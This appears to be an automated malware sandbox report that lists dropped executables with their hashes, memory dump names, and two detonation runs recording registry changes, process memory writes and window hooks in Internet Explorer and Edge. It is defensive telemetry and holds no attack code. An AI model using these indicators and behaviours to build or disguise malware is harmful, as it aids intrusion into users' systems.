memory/2772-893-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2952-902-0x0000000004670000-0x0000000004983000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe
| MD5 | 32caa1d65fa9e190ba77fadb84c64698 |
| SHA1 | c96f77773845256728ae237f18a8cbc091aa3a59 |
| SHA256 | b5713079bc540d78a13d71edfe7387f97d771a3f30305a5b2978d77829ead3b1 |
| SHA512 | 2dc5fe00b6536fc65f94baf71046bc3175eb1f5dec3969307aa5774601eb8fbfa24117e3e0adecd617ac2831c119bccb06e5b8b06b149075e06b76e921f71a60 |
C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe
| MD5 | e4dbe59c82ca504abea3cd2edf1d88c2 |
| SHA1 | ffbb19f3f677177d1b424c342c234f7e54e698ad |
| SHA256 | b95f594a74bc165d43b272512ad01abf01f9e3be43af99333acb971888f56edf |
| SHA512 | 137a3e3da2467631c924117e3ed8f53a249c2efc3ddad6453ac1c28b97cd19736d8fa3d4c9af1c328658c77740991c18f8808e55c5567bd21a2c2f6be4c8e65f |
memory/2420-927-0x00000000002D0000-0x00000000002D8000-memory.dmp
memory/2420-928-0x00000000050D0000-0x00000000053C0000-memory.dmp
memory/2420-929-0x0000000004CB0000-0x0000000004D3C000-memory.dmp
memory/2420-930-0x0000000000370000-0x0000000000392000-memory.dmp
memory/2420-931-0x0000000004DE0000-0x0000000004F8C000-memory.dmp
memory/2008-946-0x0000000002090000-0x00000000020BE000-memory.dmp
memory/2008-948-0x0000000002120000-0x000000000212A000-memory.dmp
memory/2008-950-0x00000000043D0000-0x000000000445C000-memory.dmp
memory/2008-952-0x0000000004DA0000-0x0000000004F4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
| MD5 | 971c0e70de5bb3de0c9911cf96d11743 |
| SHA1 | 43badfc19a7e07671817cf05b39bc28a6c22e122 |
| SHA256 | 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d |
| SHA512 | a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2 |
memory/3028-1008-0x00000000004C0000-0x00000000004D8000-memory.dmp
memory/3028-1009-0x00000000004C0000-0x00000000004D8000-memory.dmp
memory/3028-1010-0x0000000000570000-0x00000000005FC000-memory.dmp
memory/3028-1011-0x0000000003A40000-0x0000000003BEC000-memory.dmp
C:\Windows\Installer\f77f1c1.msi
| MD5 | aa58a0c608a2ec60555c011fe3788152 |
| SHA1 | 39cb0cda4015b3dcc5e827a74f8f1f0b4e48cf0a |
| SHA256 | 564acb8e62d7ca9d440895bf347d8312fbfabb3d36eeacf247e115e766f499bd |
| SHA512 | ff97035063141aa23a52c4b61c6e9585f66db2d6deed61b0a318e732790f4137af18fdf0fbd6e4648532da3f6a482046a183565cf3c0750101b13bc7d1763b77 |
C:\Config.Msi\f77f1c0.rbs
| MD5 | e36b437ef8892feb9d05700a458bcc81 |
| SHA1 | b690ad5654b3821fdbb43941d5309ff08651f3a9 |
| SHA256 | 8cbd3ef3a590d03c37a4a0769700830f8456217d4b3dd63d6d741403387b4d34 |
| SHA512 | 369588d114220ec4628721da318dfc4f36c7c0111f5f51c762af99a8eb5d0758788828a83fed790ddd7bc6a6b7c4d71dcd58eca1e6b39c9c1e0df5a0ad43e1a7 |
memory/3028-1026-0x0000000000D30000-0x0000000000D66000-memory.dmp
memory/3028-1027-0x00000000010A0000-0x00000000010E1000-memory.dmp
memory/3028-1028-0x0000000001140000-0x0000000001215000-memory.dmp
memory/1952-1031-0x0000000000C20000-0x0000000000CB6000-memory.dmp
memory/1952-1032-0x0000000000440000-0x0000000000476000-memory.dmp
memory/1952-1033-0x00000000004A0000-0x000000000052C000-memory.dmp
memory/1952-1034-0x000000001B530000-0x000000001B6DC000-memory.dmp
memory/1952-1035-0x0000000000530000-0x0000000000548000-memory.dmp
memory/1952-1036-0x0000000000550000-0x0000000000568000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
| MD5 | 5487dcc2e2a5d7e109c3fd49f37a798b |
| SHA1 | 1ad449a9ef2e12d905e456f9b56f97a3d0544282 |
| SHA256 | b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5 |
| SHA512 | ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845 |
memory/920-1049-0x0000000000AF0000-0x0000000000C60000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10033420101\7axE6Jz.exe
| MD5 | ab118fd9c6e1c3813ff0ec7cd8c6539f |
| SHA1 | a03967883de5cfbe96036d13eac74bbb030903ef |
| SHA256 | 57153e88e47ac7b13751e8382e021cad96481f68bfa41510ed5b402adbecd7ad |
| SHA512 | 4b119738f8843025fe8c158c02a32c1e147fdbce41671c80ef58f1daec3f555fbe0248ed7174cfdebce0c5c987b616824288e3246953a79910a5504bf27fc297 |
memory/39504-1070-0x0000000000100000-0x0000000000168000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
| MD5 | 139801ec12921d4a10cade0e8bd14581 |
| SHA1 | 19e4ea0a6204a9256bb2671aec86b1942d0bb63c |
| SHA256 | 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796 |
| SHA512 | 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601 |
C:\Users\Admin\AppData\Local\Temp\10035810101\b92cc19684.exe
| MD5 | 454bd2cde5257315f133cfc64bcd0351 |
| SHA1 | ccfb541cc802100b3d0bc4c4147bf0363675be2b |
| SHA256 | 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580 |
| SHA512 | da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f |
C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKOJY121V18ZC1KX4XFQ.temp
| MD5 | aed506593dd823c8790a3cedec44fd70 |
| SHA1 | 216f08275f3ebc2dd40dcbab1f38632ae0893692 |
| SHA256 | 2160cde95e3735f5f4012cc68bce3b5df4f5aa8d47cbc66d37f56b64cfab83f7 |
| SHA512 | 58614f311911d892107ba94112df74cfc0b4002bfb0e28968d22e78238978e96a8ac279c4324d245f280ccc7fadf4512b6086d267a1515229e5ea7a2d12c16ed |
C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
| MD5 | 4c3d80aa96c22ae2f7b01a904aef5ba0 |
| SHA1 | 5a4fe29daf45ada28b3a03a8284dcd098d935942 |
| SHA256 | 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f |
| SHA512 | a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204 |
memory/2952-1161-0x0000000004700000-0x0000000004BDE000-memory.dmp
memory/2952-1162-0x0000000004700000-0x0000000004BDE000-memory.dmp
memory/145340-1163-0x0000000000870000-0x0000000000D4E000-memory.dmp
memory/145340-1174-0x0000000000870000-0x0000000000D4E000-memory.dmp
memory/146796-1175-0x0000000000B30000-0x000000000100E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe
| MD5 | 13426493d75b1f9244bd160de199f5c2 |
| SHA1 | ae0afd93e3ff3bc87094b4034df6cb577f52b42c |
| SHA256 | 84266b5a9333a8ae1fc7aa8ed2a43eee12a2ba1124c1e8bd733fe7ad124d7262 |
| SHA512 | 6a34cf7129657d9092c5ef72f5b77794b3e30c49efed8728ca54f9aeafe74fb57025df65224a3041ec52b74394253c29c812478cf2a71eafc23ee63afc3b5d8d |
Analysis: behavioral16
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20241010-en
Max time kernel
90s
Max time network
137s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5a4498e0b12b844ac3fe9407cb9ea0a000000000200000000001066000000010000200000006549ac4f615653eb5bd2ea668e39acd2b112a711b481d7d90c468dcd4cb93e99000000000e8000000002000020000000a08f35846078cad7f4fad79193e44a55473e18d301b6a5527392e3fe862575399000000078c2ecea33c53551fdc72a97682b8f83ec10a845d19385e00f32602307d45b0139972872453c14e852cd0b58cc2cbbf65d8cd20b58b8b3a328c833048ff2a5ea14e9af33e29158eb495c965a78581d29e73f067c4932d02f5b84908b952bb1b56c50f43e071d5eac8704f32f8d4d03cede0de8a2f4af0485c649bd5e1ebf26dab0efdb6a184f6b1063772a62eb3535df400000001ef1b973d42ad7539e575f48dadf3a093df6cb5273468d6452677122445c1e8c5aa5a3d73c611404c446155cb8b9d4dc04268ac17a4258352085c3e48b3251fb | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5a4498e0b12b844ac3fe9407cb9ea0a000000000200000000001066000000010000200000001a3c81562a3439adb5d61fb5755d4f524ffafab4f0067567f69a270cd9c867b7000000000e8000000002000020000000d288f5f8f6f9ac796d7adea3afc3e68d2c9bf9d6061476150b9c3920c990371a2000000088d2d2c453dc7f67f0a12437eb296af618507c8619396f00b5b89a853ad7b10040000000697d9ebb5b757b6de70bc70ba6ad9a6d3b767eba3952f8190af92d09a421c4fa0374a54ed3dfbd24b0626de7ed9cc99586b7ee567c98c75e28525431756069f9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774342" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AA026B1-F499-11EF-B66C-7E31667997D6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b01d891fa688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1268 wrote to memory of 2904 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\imfsCjY.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1268 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab8BDE.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Cab8D28.tmp
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\Tar8D5B.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 74d6f818a8ee868b805c3150db7b202e |
| SHA1 | c5680e4c1f0d15fc35a85f431f875348e00b9c42 |
| SHA256 | 43bec25a2409e9e72d90210652e30f8bc5af87392e761f99e29612733eb83070 |
| SHA512 | 468ec373b565ce5612ea6e4aecdba302966f0989a728177d2b8f05ef9e95b4bd645abe368524a9eead7fb618ed202440c9bdd272403e5a18776d7ed3ed9f2642 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 618a7bc75348bd0822db78498308f443 |
| SHA1 | a5364c63caba42c96a35fbd07f6b1fd132b74954 |
| SHA256 | f2091af2c7fad71c5f318dd442634884ec7f04d23404018d61952960ad73fa67 |
| SHA512 | a13bff76daf6c7da90080587a2ce57ac373ec1515a8d79477b9e9dbc286bc038b114a123b83c42bed5529251099b3084267bdf59f324be5c3ec72c1de8136658 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 41e25769df61590d65ab348d00070a76 |
| SHA1 | 859a2ce2b0a1694558b2248fc169835a79167eec |
| SHA256 | 547f0746c5c6f42ad0d86b25130408382bd5d1a18bd3378453df7c2b06f559dd |
| SHA512 | f3081050569a2b7270044386abd264a72d768717368eaaa17f51438070b95226f261a81bbeae72bfac8483018f37d50bede3eabbff4d40948ca01ef95bd7b4ef |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1d3d542813d5cc253767e10a54c94caf |
| SHA1 | e8283157e5e63e37024d757efc44b214b9cd1ebf |
| SHA256 | 701225ede54aee2f53f8ca8ead03bddc027731eded8f822d23d4c8ddf7a8b1ce |
| SHA512 | 62208c1a56a0c53cfad45254809dc7dd462e4559e8596faf1e720391230ad6ad9ae9b237df102186206ec32d266592d05bc86dedc58249009063df502bb64626 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7f67868e5f213626b0a2b4d1f291c7c4 |
| SHA1 | 44d95bd4a417a4d3bb4a51214f186c79ce699497 |
| SHA256 | f135d08cfd6c09340cd191e831b56469bc3635d944163114c74e0320889d2ea5 |
| SHA512 | 2274d05f0be146718515d110e746c562d8ba830b6d63464593d2decfc051d73c04f925d115a6db24c566720b5cf85e4c1bcda3048347ed13f54883e83c7e489e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 61ad19a336b8d7517d76611d12341253 |
| SHA1 | 1c5e457d780e0851d6227cfc0f87d8754db15468 |
| SHA256 | 3efe3c8db583c08adfb303934be9a506ea73b5bf516036c4b86b3d28bb944991 |
| SHA512 | 627836bf8e61ae73b26657befc096b86be9a977a4407a47b06fca49e9578010a88550bba70aaca49e47c98dff4638a107bceda5bce5fdfd43a5d29d0d421b9c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 252c7f06b51f7445e02ea235c5aa6320 |
| SHA1 | 23b1706aed751de6a28a74a80a1a07f5f34a7476 |
| SHA256 | c97ee628b47bf8aba12cdee4757cb2488a4401b9967b08136a018f9c829ba1af |
| SHA512 | a7dab346c88004c47bc9c447896ec018c5aa7c45caac2e602877ab12053234019cea00b188356618693eed94f8119e8aa40263ee9373dc669062426637b54c1b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c3066d4ee42ae6818586ac8e5fa73cb |
| SHA1 | 8c8d4019201a03e5f229c3d393925dc3b0d75982 |
| SHA256 | 479ddbff1fc776e144cdc27324efd25ff145e0fe3bf810aa16bd9ff0d5da106b |
| SHA512 | 4a2faa3fd6598633885d5ceb399da96613bd24b67137097abb32f08e316992ffb0d66057000875129dce691561e44d40a48879d92198e3b3a0acae526c71fdc6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a6b2dc49dda314745a1eb7386f1db948 |
| SHA1 | 929510267096fbfffd9de695ddf7a8f306e18459 |
| SHA256 | 11a402830ce22d5262014eb7d3b63bef4401a16a18d52c6f7b9b46cfaef3f025 |
| SHA512 | 13eb1f477e64c0bfc00f09f403132373e42d8d68141dddf71f0ebd5bef4acc860b250a4c84c42e0e699549a8b2fd37790d9a5a991bad792ca4d06e229132b85d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0f0d56d17be620a29ae3d7a744c66db0 |
| SHA1 | 98fe169ee27bf727b99f7460736f694cdeaec8ee |
| SHA256 | 3d0e83d8bb92245a2b8af9b8376a19fcf337aca14b6a0e8b3fec4093bbb8e10e |
| SHA512 | 11b352cf8ef2b6ddae4756c75c08a835e1970291856ae81670f530b361a88f281fa9e9c6a21cc208b0db7a3c8ab4461097fd7dbb336dcfc8a0e43ac95a024f9b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a51a7724ec10acce569195f13c2a6375 |
| SHA1 | f68fe782f27ca62727cc3b92ff738f67305173d7 |
| SHA256 | 3d3842eb7cffe5b4ab15cd93d8ca7e2578a3e4e3473bbdac7f728bdc642b0dad |
| SHA512 | aca36893d06b770f6447f65437a8e413a78194c893d9ee584d61a80594ab775ce8e202eb46029d96f302b7c6f9954c3fed5ab984912066fd5ca1ce6177575a79 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3014a4db4441054a9f855084bc34749a |
| SHA1 | 8d4cb94f20efef927f464407e6946de934748aef |
| SHA256 | 2f9debc95fb56eb879ab98ddbc457bfc9c2dc79b533bf08dceb71c71e6ad5cfd |
| SHA512 | ee898bc30a7f02af6a898d488974f6bf8da65639135ff7028fb86346abfd3fc0dc5ad712daedc4e9c2287a3f62b523b0ab0177db93e83beb4c80e01b1d136f7f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 57fea08146178e608a209293ff1be0b4 |
| SHA1 | f0cbb7ec3528952f8c7f9bb9c8d3394d61f3b0ee |
| SHA256 | bd73c4ff12884a0f4270a3b91b4b4dc310d9336e9ceb1ca71bb9c0a8372e86c0 |
| SHA512 | 8cf055fcf6d984dc758fe6420b577b02cb540bd455e89e50f0bac24000ccceea177f1599e5acf88e85e40617c30305f7d737a206d065d4a3970822d17f792fca |
Analysis: behavioral17
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
145s
Max time network
131s
Command Line
Signatures
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
